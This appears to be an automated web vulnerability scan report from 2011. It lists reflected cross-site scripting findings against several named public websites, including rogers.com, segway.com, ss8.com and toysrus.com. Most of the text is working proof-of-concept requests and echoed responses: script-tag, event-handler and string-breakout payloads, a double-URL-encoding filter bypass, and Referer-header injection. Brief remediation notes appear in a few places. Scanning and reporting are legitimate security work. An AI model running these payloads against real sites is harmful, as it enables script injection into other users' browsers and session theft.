The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 311fa'><script>alert(1)</script>0f53d7843a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 29efa'><script>alert(1)</script>f4dd780797b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d2b1'><script>alert(1)</script>32b5bf1b952 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a01b8'><script>alert(1)</script>f41bb64167 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 581e2'><script>alert(1)</script>47043ee47e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b06f9'><script>alert(1)</script>ee7a096cab8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8c58b'><script>alert(1)</script>8fcc46ea593 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b0c4'><script>alert(1)</script>cf09d0f1d85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 618f0'><script>alert(1)</script>25b56d54147 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f2df3'><script>alert(1)</script>1b7cf0cc3e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71c2a"><img%20src%3da%20onerror%3dalert(1)>8605f7417b8 was submitted in the REST URL parameter 2. This input was echoed as 71c2a"><img src=a onerror=alert(1)>8605f7417b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /web/content71c2a"><img%20src%3da%20onerror%3dalert(1)>8605f7417b8/SHM_Coming_Soon HTTP/1.1
Host: www.rogers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 13 Oct 2011 11:04:23 GMT
Server: Apache
Set-Cookie: TLTSID=1B6974B2F58B10F5026592A23484D62A; Path=/; Domain=.rogers.com
Set-Cookie: TLTUID=1B6974B2F58B10F5026592A23484D62A; Path=/; Domain=.rogers.com; Expires=Thu, 13-10-2021 11:04:23 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48509
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html> <head> <title>This page cannot be found - 404 Error</title> <SCRIPT LANGUA ...[SNIP]... <a href="/web/content71c2a"><img src=a onerror=alert(1)>8605f7417b8/SHM_Coming_Soon;jsessionid=hCS3TWFXn8GYhZtpXtGGy2fGlh7xppj4VQxzz8jh1Vy3x49zs42B!506780405?_nfpb=true&_pageLabel=Home&_nfls=true&setLanguage=fr"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6d53"%3b4fb4a7d75e9 was submitted in the REST URL parameter 3. This input was echoed as f6d53";4fb4a7d75e9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /web/content/SHM_Coming_Soonf6d53"%3b4fb4a7d75e9 HTTP/1.1
Host: www.rogers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.13. https://www.rogers.com/web/content/SHM_Coming_Soon [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.rogers.com
Path: /web/content/SHM_Coming_Soon
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f63c1"-alert(1)-"40d7d326a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /web/content/SHM_Coming_Soon?f63c1"-alert(1)-"40d7d326a0=1 HTTP/1.1
Host: www.rogers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.14. http://www.rpxcorp.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.rpxcorp.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83a11"><a>492cb211934 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?83a11"><a>492cb211934=1 HTTP/1.1
Host: www.rpxcorp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Thu, 13 Oct 2011 11:03:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=12986745;path=/
Set-Cookie: CFTOKEN=12340961;path=/
Set-Cookie: DEBUG=0;path=/
Set-Cookie: USERID=;path=/
Set-Cookie: USERNAME=;path=/
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <a href="/index.cfm?83a11"><a>492cb211934=1&fontsize=1" class="on"> ...[SNIP]...
1.15. http://www.segway.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.segway.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41e1c"-alert(1)-"a4d5bfe43e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?41e1c"-alert(1)-"a4d5bfe43e2=1 HTTP/1.1
Host: www.segway.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:03:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Set-Cookie: safety_popup_counter=1; expires=Sun, 07-Oct-2012 11:03:44 GMT
Connection: close
Content-Type: text/html
Content-Length: 19921
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
...[SNIP]... <script type="text/javascript">a2a_linkname="Segway Home Page";a2a_linkurl="www.segway.com/?41e1c"-alert(1)-"a4d5bfe43e2=1";</script> ...[SNIP]...
1.16. http://www.silverspringnet.com/search.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.silverspringnet.com
Path: /search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d67e9"><script>alert(1)</script>16b9b2438e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.php/d67e9"><script>alert(1)</script>16b9b2438e2 HTTP/1.1
Host: www.silverspringnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:04:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 6068
Connection: close
Content-Type: text/html; charset=windows-1252
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- This is the search template file (search_template.html) which contai ...[SNIP]... <form method="get" action="/search.php/d67e9"><script>alert(1)</script>16b9b2438e2" class="zoom_searchform"> ...[SNIP]...
1.17. http://www.spotmixer.com/create_video/home [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.spotmixer.com
Path: /create_video/home
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b616d"><script>alert(1)</script>5705d444d5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /create_video/home?b616d"><script>alert(1)</script>5705d444d5a=1 HTTP/1.1
Host: www.spotmixer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:04:36 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7m mod_jk/1.2.26
Cache-Control: no-cache
Set-Cookie: JSESSIONID=22F99E6D8A5AFAF6F7F431021E382FC3; Path=/create_video
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitio ...[SNIP]... <form id="form_login" name="login_form" method="post" action="https://www.spotmixer.com/create_video/home?b616d"><script>alert(1)</script>5705d444d5a=1"> ...[SNIP]...
1.18. http://www.spotmixer.com/create_video/register [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.spotmixer.com
Path: /create_video/register
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34282"><script>alert(1)</script>365ee9000a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /create_video/register?34282"><script>alert(1)</script>365ee9000a8=1 HTTP/1.1
Host: www.spotmixer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:04:36 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7m mod_jk/1.2.26
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitio ...[SNIP]... <form name="register_form" method="post" action="https://www.spotmixer.com/create_video/register?34282"><script>alert(1)</script>365ee9000a8=1"> ...[SNIP]...
1.19. http://www.ss8.com/login-lost-password.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ss8.com
Path: /login-lost-password.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fa6e"><script>alert(1)</script>fee3537570 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login-lost-password.php/3fa6e"><script>alert(1)</script>fee3537570 HTTP/1.1
Host: www.ss8.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:04:45 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 4664
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
1.20. http://www.ss8.com/login.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ss8.com
Path: /login.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c376b"><script>alert(1)</script>4a485a12cae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login.php/c376b"><script>alert(1)</script>4a485a12cae HTTP/1.1
Host: www.ss8.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:04:39 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 4822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
1.21. http://www.ss8.com/user-registration.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ss8.com
Path: /user-registration.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 206fa"><script>alert(1)</script>547dfd0c1c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /user-registration.php/206fa"><script>alert(1)</script>547dfd0c1c1 HTTP/1.1
Host: www.ss8.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:04:39 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 5727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
The value of the kword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b652f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c17649a973 was submitted in the kword parameter. This input was echoed as b652f"><script>alert(1)</script>6c17649a973 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the kword request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ventureloop/job_search.php?g=0&kword=gmz+energyb652f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c17649a973&jcat=%&jt=1&jc=1&jd=1&fb=1&srchid=0%7C1305743729&btn=1&pagid=0 HTTP/1.1
Host: www.ventureloop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:03:24 GMT
Server: Apache
Set-Cookie: PHPSESSID=1tmnpvt7n7ef8knna1rv1nhjr4; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35166
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fa254<script>alert(1)</script>c1576a2b5bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /basefa254<script>alert(1)</script>c1576a2b5bf/login.phpx HTTP/1.1
Host: www.veracyte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b11b2<script>alert(1)</script>c77da55e264 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /base/login.phpxb11b2<script>alert(1)</script>c77da55e264 HTTP/1.1
Host: www.veracyte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Bad file./home/veracyte/public_html/base/login.phpxb11b2<script>alert(1)</script>c77da55e264
1.25. http://www.whatstyle.net/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.whatstyle.net
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee403"><script>alert(1)</script>fad55204c76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?ee403"><script>alert(1)</script>fad55204c76=1 HTTP/1.1
Host: www.whatstyle.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>Home | whatstyle.net</title> <meta http-equiv="Content-Type" content="tex ...[SNIP]... <a lang="nl" hreflang="nl" href="http://www.whatstyle.net/nl.index.php?ee403"><script>alert(1)</script>fad55204c76=1" title="Bekijk deze pagina in het Nederlands"> ...[SNIP]...
1.26. http://x3show.mevio.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://x3show.mevio.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59636</script><script>alert(1)</script>210e0a57c69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?59636</script><script>alert(1)</script>210e0a57c69=1 HTTP/1.1
Host: x3show.mevio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:meebo="http://www.meebo.com"> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39032"><script>alert(1)</script>405e9d78bc0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1
Host: www.sportsauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=39032"><script>alert(1)</script>405e9d78bc0
Response (redirected)
HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=ISO-8859-1
Date: Thu, 13 Oct 2011 11:04:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=PyhWTWFHJML0k2Tp9pLd2lVJG2lphzVnYk2QntHCCQJ7Q110221T!-617247002; path=/
Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/
Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/
Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/
Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/
Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/
Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/
Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Length: 132143
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 117fe"><script>alert(1)</script>c0d2c0471b5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /create_video/customer_service HTTP/1.1
Host: www.spotmixer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=117fe"><script>alert(1)</script>c0d2c0471b5
Response
HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:04:35 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7m mod_jk/1.2.26
Set-Cookie: JSESSIONID=A32D46864152B68684F5C20FB4B7E30D; Path=/create_video
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xh ...[SNIP]... <input type="hidden" name="return_url" value="http://www.google.com/search?hl=en&q=117fe"><script>alert(1)</script>c0d2c0471b5" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd36c"><script>alert(1)</script>2d1a52ce099 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1
Host: www.toysrus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: dd36c"><script>alert(1)</script>2d1a52ce099
Response (redirected)
HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:02:39 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=8QVvTWFPpBBbzpCxbqtwmy4JzBQTMhfcjzs79T8nHpVgpCJdm4mb!1626367435; path=/
Set-Cookie: browser_id=133516934574; expires=Sunday, 10-Oct-2021 11:02:39 GMT; path=/
Set-Cookie: browser_id=133516934574; expires=Sunday, 10-Oct-2021 11:02:39 GMT; path=/
Set-Cookie: browser_id=133516934574; expires=Sunday, 10-Oct-2021 11:02:39 GMT; path=/
Set-Cookie: browser_id=133516934574; expires=Sunday, 10-Oct-2021 11:02:39 GMT; path=/
Set-Cookie: browser_id=133516934574; expires=Sunday, 10-Oct-2021 11:02:39 GMT; path=/
Set-Cookie: browser_id=133516934574; expires=Sunday, 10-Oct-2021 11:02:39 GMT; path=/
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 94916
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.30. http://www.ss8.com/account.php [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.ss8.com
Path: /account.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfc28"><script>alert(1)</script>3a7ddddcd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /account.php/bfc28"><script>alert(1)</script>3a7ddddcd4 HTTP/1.1
Host: www.ss8.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Moved Temporarily
Date: Thu, 13 Oct 2011 11:04:46 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
